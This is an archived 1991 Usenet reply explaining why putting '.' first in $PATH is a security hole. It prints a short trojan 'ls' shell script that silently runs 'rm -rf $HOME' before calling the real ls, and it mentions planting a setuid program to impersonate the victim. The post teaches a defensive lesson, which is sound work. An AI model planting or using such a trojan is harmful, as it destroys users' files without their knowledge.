jik@athena.mit.edu (Jonathan I. Kamens) (02/22/91)
In article <1991Feb22.004010.13359@zip.eecs.umich.edu>, bguthy@amazon.eecs.umich.edu (Bala S. Guthy) writes: |> Hello, I remember when I first learnt Unix, the instructor said, |> that "." should never be the first thing in one's $path. It had |> something to do with a security hole in Unix. Does anyone know |> what and if there is any disadvantage to having "." as the first |> entry in $path. Because if you cd into a directory in which someone else has placed a trojan horse named the same as a common system utility, and then run that utility, then you're actually running the trojan horse. Example: I create a shell script in my home directory called "ls" which does this: #!/bin/sh nice /bin/sh -c "rm -rf $HOME &" exec /bin/ls $* You cd into my home directory out of curiosity and type "ls". You're scrod. You might not even notice that your files are disappearing. Alternatively, I could make my trojan horse create a program that is setuid to you that I can run at my leisure to become you. You get the idea, I hope. -- Jonathan Kamens USnail: MIT Project Athena 11 Ashford Terrace jik@Athena.MIT.EDU Allston, MA 02134 Office: 617-253-8085 Home: 617-782-0710